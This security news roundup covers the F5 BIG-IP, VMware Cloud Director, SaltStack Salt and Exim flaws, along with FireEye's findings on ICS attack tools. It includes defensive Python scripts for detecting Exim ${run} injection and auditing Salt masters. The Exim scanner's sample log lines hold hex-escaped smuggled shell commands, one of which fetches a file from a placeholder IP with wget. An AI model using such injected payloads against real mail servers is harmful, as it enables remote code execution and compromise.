F5 Networks published security advisories for both flaws last Wednesday, just as the U.S. was looking forward to the long Independence Day weekend.

Both the company and the U.S. Cyber Command urged admins on Friday to check whether their F5 BIG-IP web interfaces were exposed on the internet and to implement the offered patches before the weekend starts.

At the time, there was no public exploit available for CVE-2020-5902, but some soon became available. A Metasploit module is also in the works.

Finally, opportunistic mass scanning for vulnerable devices started during the weekend, and various attackers began leveraging the public exploits.

What to do?

According to F5 Networks, BIG-IP networking devices are used as server load balancers, application delivery controllers, access gateways, etc. by 48 of the Fortune 50 companies. They are used by ISPs and governments.

As noted before, F5 Networks released fixed software versions last week as well as helpful risk mitigation advice if patching is impossible at this moment.

For organizations that didn’t get around to any of it, Microsoft cybersecurity pro Kevin Beaumont has also offered advice.

SANS ISC handler Didier Stevens has also provided helpful links and advice.

VMware Cloud Director vulnerability enables a full cloud infrastructure takeover

A code injection vulnerability (CVE-2020-3956) affecting VMware vCloud Director could be exploited to take over the infrastructure of cloud services, Citadelo researchers have discovered.


About VMware vCloud Director and CVE-2020-3956

VMware Cloud Director (formerly known as vCloud Director) is a cloud service delivery platform used by public and private cloud providers to operate and manage cloud infrastructure.

CVE-2020-3956 was discovered by Citadelo penetration testers during a security audit of a customer’s VMWare Cloud Director-based cloud infrastructure.

“An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access,” VMware explained in a security advisory published on May 19, after the company finished releasing patches for several versions of vCloud Director.

The researchers have provided more details about the vulnerability, explained how it can be exploited, and shared an exploit.

The damage attackers can do after exploiting the flaw is substantial. They can:

  • View content of the internal system database, including password hashes of any customers allocated to this infrastructure
  • Modify the system database to steal foreign virtual machines (VM) assigned to different organizations within Cloud Director
  • Escalate privileges from “Organization Administrator” (normally a customer account) to “System Administrator” with access to all cloud accounts (organization) as an attacker can change the hash for this account
  • Modify the login page to Cloud Director, which allows the attacker to capture passwords of another customer in plaintext, including System Administrator accounts
  • Read other sensitive data related to customers.

The vulnerability has been patched

The vulnerability was privately reported to VMware, which released fixes for the affected versions in April and May.

VMware considers the flaw to be “important” and not “critical”, since an attacker must be authenticated in order to exploit CVE-2020-3956. But, as the researchers noted, “cloud providers offering a free trial to potential new customers using VMware Cloud Director are at high risk because an untrusted actor can quickly take advantage.”

Admins are advised to upgrade to vCloud Director versions 10.0.0.2, 9.7.0.5, 9.5.0.6 or 9.1.0.4 to plug the security hole. A workaround is also available for those that can’t upgrade to a recommended version, whether temporarily or at all.

VMware Cloud Director v10.1.0 and vCloud Director versions 9.0.x and 8.x are not affected by the flaw.

Hackers breached six Cisco servers through SaltStack Salt vulnerabilities

Earlier this month, when F-Secure publicly revealed the existence of two vulnerabilities affecting SaltStack Salt and attackers started actively exploiting them, Cisco was among the victims.


The revelation was made on Thursday, when Cisco published an advisory saying that, on May 7, 2020, it had discovered the compromise of six of its salt-master servers, which are part of the Cisco VIRL-PE (Virtual Internet Routing Lab Personal Edition) service infrastructure.

About SaltStack Salt, the vulnerabilities, and the problem with patching

SaltStack Salt is open source software that is used for managing and monitoring servers in datacenters and cloud environments. It is installed on a “master” server and it manages “minion” servers via an API agent.

The two recently revealed vulnerabilities – CVE-2020-11651 (an authentication bypass flaw) and CVE-2020-11652 (a directory traversal flaw) – can be exploited by unauthenticated, remote attackers to achieve RCE as root on both masters and minions.

The flaws were fixed in late April, but not all exposed Salt servers have been patched. A few weeks ago, Censys put the number of potentially vulnerable, internet-exposed Salt servers at 2,928.

One of the things that likely delayed the deployment of patches is the fact that Salt is integrated in other solutions, and the developers of those solutions took some time to push out security updates.

VMware vRealize Operations Manager is one of those solutions, and so are two network architecture modeling and testing solutions by Cisco.

Cisco’s breach

“Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities,” Cisco shared.

“Cisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE. Those servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.”

The company remediated the affected servers the same day and has provided software updates that address these vulnerabilities, so that enterprise admins who installed these solutions on-premises can fix them.

For more information about which software releases are affected and under what conditions, admins should peruse the advisory, which also offers some workarounds.

Cisco did not say what the attackers’ ultimate goal was, but in previously disclosed attacks, the intent was to install cryptocoin miners.

NSA warns about Sandworm APT exploiting Exim flaw

The Russian APT group Sandworm has been exploiting a critical Exim flaw (CVE-2019-10149) to compromise mail servers since August 2019, the NSA has warned in a security advisory published on Thursday.


“When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” they said.

The script would then attempt to add privileged users, disable network security settings, update SSH configurations to enable additional remote access, and execute an additional script to enable follow-on exploitation.

About Exim and the flaw

Exim is a mail transfer agent (MTA) that is commonly used for Unix-based systems and comes pre-installed on some Linux distributions.

It is the most widely used MTA and is deployed on over half of all Internet-facing mail servers.

While it’s efficient and highly configurable, its widespread use makes it a common target for attackers, who are always on the lookout for exploitable vulnerabilities. In Q2 2019 there were a few, the most critical being CVE-2019-10149.

Its existence was disclosed in June 2019, after a patch had been provided for the supported versions and for a few that are no longer supported.

Soon after, attackers started exploiting it to compromise Linux servers and install cryptocoin miners on them, and Microsoft warned about a Linux worm leveraging the flaw to target Azure virtual machines (VMs) running affected versions of Exim.

Mitigation and detection

The NSA has provided mitigation advice as well as indicators of compromise so that organizations can protect themselves and check whether they’ve been targeted by the Sandworm attackers (aka the BlackEnergy APT, aka Telebots), who have in the past been linked to cyber-espionage campaigns targeting NATO, the EU, the White House, a variety of US ICS operators, and Ukrainian energy companies, financial sector organizations and news media companies.

First and foremost, admins are advised to update their Exim installations to the latest stable release (v4.93) to mitigate this and other vulnerabilities.

“Other vulnerabilities exist and are likely to be exploited, so the latest fully patched version should be used,” the NSA said, and advised system administrators to continually check software versions and update as new versions become available.

“The actors exploited victims using Exim software on their public facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message,” they explained.


Admins and IT security staff can detect and/or block exploitation of the flaw by using specific Snort rules, checking traffic logs for emails with a recipient containing “${run”, and routinely checking for unauthorized system modifications.
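An added example of the log check described above; it is not the NSA’s or Exim’s code. It scans Exim main-log style lines for a sender or recipient containing `${run`, pulls out the smuggled command, reverses the `\xHH` and `\t` escapes that Exim’s string expansion accepts (which is how such payloads avoid literal spaces and slashes in an address), and records the peer IP for blocking. The log lines are constructed to match that shape; the addresses, URL and command are placeholders.

```python
"""Find CVE-2019-10149-style ${run{...}} payloads in Exim log lines."""
import re

# Constructed Exim main-log style lines, not real captures. Lines 2 and 3
# carry the indicator the NSA advisory describes, an address containing
# "${run"; the IPs, the URL and the command are placeholders.
SAMPLE_EXIM_LOG = [
    r'2020-05-28 09:12:01 1jdsjk-0003Xd-7b <= alice@example.org H=mail.example.org [192.0.2.10] P=esmtps S=2048',
    r'2020-05-28 09:13:44 H=(localhost) [198.51.100.23] F=<> rejected RCPT <${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20http:\x2F\x2F203.0.113.7\x2Fi\x20-O\x20\x2Ftmp\x2Fi\x22}}@localhost>: Unrouteable address',
    r'2020-05-28 09:13:45 H=(localhost) [198.51.100.23] F=<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x22}}@localhost> rejected RCPT <root@localhost>: sender verify fail',
    r'2020-05-28 09:14:02 1jdsk0-0003Xf-Aa => bob@example.org R=dnslookup T=remote_smtp H=mx.example.net [192.0.2.44]',
]

RUN_RE = re.compile(r'\$\{\s*run\s*\{')           # start of an Exim ${run{...}} expansion
ADDR_RE = re.compile(r'(?:F=<|RCPT <)([^>]*)>')     # sender (F=<...>) and recipient (RCPT <...>)
IP_RE = re.compile(r'\[(\d{1,3}(?:\.\d{1,3}){3})\]')


def unescape_exim(s):
    r"""Exim string expansion accepts \xHH, \t and \n escapes; attackers use
    them to keep spaces and slashes out of the address. Reverse them so the
    command reads as the shell would see it."""
    s = re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)
    return s.replace('\\t', '\t').replace('\\n', '\n')


def extract_run_command(address):
    """Return the decoded payload inside ${run{...}}, or None if absent."""
    m = RUN_RE.search(address)
    if not m:
        return None
    depth, start = 1, m.end()
    for i in range(start, len(address)):           # walk to the matching '}'
        if address[i] == '{':
            depth += 1
        elif address[i] == '}':
            depth -= 1
            if depth == 0:
                return unescape_exim(address[start:i])
    return unescape_exim(address[start:])           # unterminated: still report it


def scan(lines):
    """One finding per address (sender or recipient) carrying a ${run payload."""
    findings = []
    for n, line in enumerate(lines, 1):
        for addr in ADDR_RE.findall(line):
            cmd = extract_run_command(addr)
            if cmd is None:
                continue
            ip = IP_RE.search(line)
            findings.append({'line': n, 'ip': ip.group(1) if ip else None,
                             'address': addr, 'command': cmd})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_EXIM_LOG):
        print(f"line {f['line']} from {f['ip']}: {f['command']!r}")
```

A rejection line is not an all-clear: on a vulnerable Exim the expansion runs during delivery, so a hit in the logs means the command was attempted, and the host should be checked for the modifications the NSA lists (new privileged users, changed SSH configuration, downloaded scripts).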

The NSA provided IP addresses and domains that were associated with the Sandworm attacks and offered additional advice on how to apply multiple defensive layers to protect public facing software such as MTAs.

Despite lower number of vulnerability disclosures, security teams have their work cut out for them

The number of vulnerabilities disclosed in Q1 2020 has decreased by 19.8% compared to Q1 2019, making this likely the only true dip observed within the last 10 years, Risk Based Security reveals.


Vulnerabilities of interest disclosed in Q1 2020

Vulnerabilities disclosed in Q1 2020: What happened?

Many factors have been identified as potential contributors to this decline, including the COVID-19 pandemic, though its precise impact may not be known for another year.

“Although the pandemic has already brought unprecedented changes to all walks of life, it is difficult to predict precisely how it will impact vulnerability disclosures this year,” commented Brian Martin, Vice President of Vulnerability Intelligence at Risk Based Security.

“It is possible, as we’ve seen with data breaches, that some researchers and companies may be slower to disclose vulnerabilities. Between drastic changes in work environments and a global pandemic, vulnerability disclosure totals may be directly impacted.”

Many vulnerabilities lacking detail in CVE

Despite the lower total number of vulnerability disclosures in Q1, security teams have their work cut out for them. 561 vulnerabilities have been identified that have a public exploit, yet do not have any detail in CVE.

Worse, 60.2% of those vulnerabilities are remotely exploitable. This is problematic for many organizations that rely on security tools that are based on CVE data and have little in the way of detection and mitigation.


Top ten products by vulnerability disclosures in Q1 2020, as compared to 2019

“Those vulnerabilities include issues such as remote authentication bypass, stored XSS, SQL injection, information disclosure, denial of service, and more,” Mr. Martin concluded.

“Some of these vulnerabilities are present in software from Symantec, Apple, Atlassian, ManageEngine, Nextcloud, Jetbrains, and IBM to name a few. That should give pause to anyone who has to come up with a mitigation strategy where patching ‘in the right order’ becomes a key strategy.”

Have you updated SaltStack Salt? Attacks are underway!

Have you updated your SaltStack Salt “masters” and made them inaccessible over the internet – or at least restricted access to them?


Even though F-Secure researchers declined to publish PoC exploit code for two critical Salt flaws they recently discovered and privately disclosed, it didn’t take long for others to do it and for attackers to try to exploit them.

Successful exploitations

In the wake of the public revelation of the flaws affecting the popular server configuration management framework, attackers hit the LineageOS project, the Ghost blogging platform, DigiCert, as well as Xen Orchestra (a web-based management service for Xen hypervisors) and Algolia (an enterprise search and discovery provider).

The attacks were “noisy” (most installed cryptominers, some also RATs) and were discovered and publicized quickly, which made the number of vulnerable Salt installations exposed on the internet fall from nearly 6,000 to 3,722 in a mere five days (May 1 to May 6).

Given the attention the attacks have garnered the number is surely even lower by now and, hopefully, organizations are also updating their internal-facing installations to prevent lateral exploitation and movement.

What to do?

SaltStack provided security updates for both supported (2019.2.3 and 3000.1) and earlier versions (2015.8.x, 2016.3.x, 2016.11.x, 2017.7.x and 2018.3.x) and advised admins to harden their installations further.

There are tools for checking whether installations are vulnerable. There’s also an ongoing thread on GitHub where admins of affected organizations are sharing details about their masters being breached through the flaws.
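An added example, not SaltStack’s or Cisco’s tooling, for the two questions raised here and in the Cisco item above: is this master on a fixed release, and do its ports listen on every interface? The fixed versions 2019.2.3 and 3000.1 are the ones named above; for the older branches the article gives no patch version, so the check only says the backport must be confirmed. The master ports 4505/4506 are Salt’s defaults and are my assumption, as is the `ss -ltn` output it parses, which is constructed.

```python
"""Quick audit of a Salt master: fixed release? ports bound to every interface?"""
import re

# Fixed releases named in SaltStack's advisory as reported above. The older
# branches received backported patches whose version numbers the article does
# not give, so they are reported as "confirm backport" rather than guessed.
SUPPORTED_FIXED = {"3000": (3000, 1), "2019.2": (2019, 2, 3)}
LEGACY_BRANCHES = ("2015.8", "2016.3", "2016.11", "2017.7", "2018.3")

# Salt's default master ports (ZeroMQ publish and request channels). Assumption
# taken from Salt's defaults; the article does not list them.
MASTER_PORTS = {4505, 4506}
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}

# Constructed `ss -ltn` output, as one would capture it on the master.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       1000    0.0.0.0:4505         0.0.0.0:*
LISTEN  0       1000    0.0.0.0:4506         0.0.0.0:*
LISTEN  0       128     127.0.0.1:8000       0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
"""


def parse_version(text):
    """'salt 2019.2.0 (Fluorine)', 'salt 3000.1' or '3000' -> tuple of ints."""
    m = re.search(r'\b(\d+(?:\.\d+)*)\b', text)
    if not m:
        raise ValueError(f"no version in {text!r}")
    return tuple(int(p) for p in m.group(1).split('.'))


def version_status(text):
    """Classify `salt --version` output against the fixed releases."""
    v = parse_version(text)
    padded = (v + (0, 0, 0))[:3]
    if v[0] >= 3000:                     # new numbering: 3000, 3000.1, 3001, ...
        return 'patched' if padded[:2] >= SUPPORTED_FIXED["3000"] else 'vulnerable'
    branch = f"{v[0]}.{v[1]}" if len(v) > 1 else str(v[0])
    if branch == "2019.2":
        return 'patched' if padded >= SUPPORTED_FIXED["2019.2"] else 'vulnerable'
    if branch in LEGACY_BRANCHES:
        return f'legacy branch {branch}: confirm the SaltStack backport is installed'
    return 'unsupported or unknown release: treat as vulnerable'


def exposed_master_ports(ss_output):
    """(address, port) pairs where a master port listens on a wildcard address,
    i.e. reachable from every interface unless a firewall says otherwise."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != 'LISTEN':
            continue
        addr, _, port = fields[3].rpartition(':')
        if port.isdigit() and int(port) in MASTER_PORTS and addr in WILDCARD_ADDRS:
            exposed.append((addr, int(port)))
    return exposed


if __name__ == '__main__':
    print(version_status('salt 2019.2.0 (Fluorine)'))
    print(exposed_master_ports(SAMPLE_SS_OUTPUT))
```

A master bound to a specific internal address still needs a firewall rule limiting 4505/4506 to the minion networks; the listen check only catches the worst case of a master answering on every interface.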

It’s also good to note that some other solutions might have Salt integrated and will require updates. An example of this is the VMware vRealize Operations Manager, for which VMware plans to release updates soon (in the meantime, workarounds have been made available).

Widely available ICS attack tools lower the barrier for attackers

The general availability of ICS-specific intrusion and attack tools is widening the pool of attackers capable of targeting operational technology (OT) networks and industrial control systems (ICS).

“As ICS are a distinct sub-domain to information and computer technology, successful intrusions and attacks against these systems often require specialized knowledge, establishing a higher threshold for successful attacks. Since intrusion and attack tools are often developed by someone who already has the expertise, these tools can help threat actors bypass the need for gaining some of this expertise themselves, or it can help them gain the requisite knowledge more quickly,” FireEye researchers point out.

The tools can also come in handy to experienced actors who might want to conceal their identity or maximize their budget.

ICS attack tools: What’s out there?

The researchers have been tracking a large number of publicly available ICS-specific cyber operation tools for a while now, and here’s what they can tell us about them:

  • Most of them have been developed in the last ten years
  • Most tools are vendor agnostic
  • Not unexpectedly, developers mostly concentrate on creating tools to target the most widely used solutions by the largest ICS original equipment manufacturers such as Siemens, Schneider Electric, GE, ABB, Digi International, Rockwell Automation, and Wind River Systems.

Some tools are “standalone”, others come in the form of modules for popular exploitation frameworks.

Over half of the “standalone” tools are either network discovery tools for learning about ICS devices attached to a network or software exploitation tools; FireEye’s chart breaks the tools down by category.

To create some of the tools, such as ICS-specific malware and ransomware, creators have to have a high degree of knowledge about the target systems as well as coding skills – something that is out of reach for many aspiring attackers.

ICS-specific exploit modules

There is a variety of ICS-specific exploit modules for exploitation frameworks such as Metasploit (free), Core Impact and Immunity Canvas (both commercial), as well as for more recent ICS-specific exploit frameworks: Autosploit, Industrial Exploitation Framework (ICSSPLOIT), and the Industrial Security Exploitation Framework.

“We currently track hundreds of ICS-specific exploit modules related to more than 500 total vulnerabilities, 71 percent of them being potential zero-days,” the researchers noted.

Of the three non-ICS-specific frameworks, Metasploit has the fewest ICS-specific exploits, but because it is freely available, these exploits may currently represent the highest danger for defenders.

They mostly target products by a handful of vendors; FireEye’s chart gives the per-vendor breakdown.

“Awareness about the proliferation of ICS cyber operation tools should serve as an important risk indicator of the evolving threat landscape,” the researchers noted.

“Organizations that do not pay attention to available ICS cyber operation tools risk becoming low-hanging fruit for both sophisticated and inexperienced threat actors exploring new capabilities.”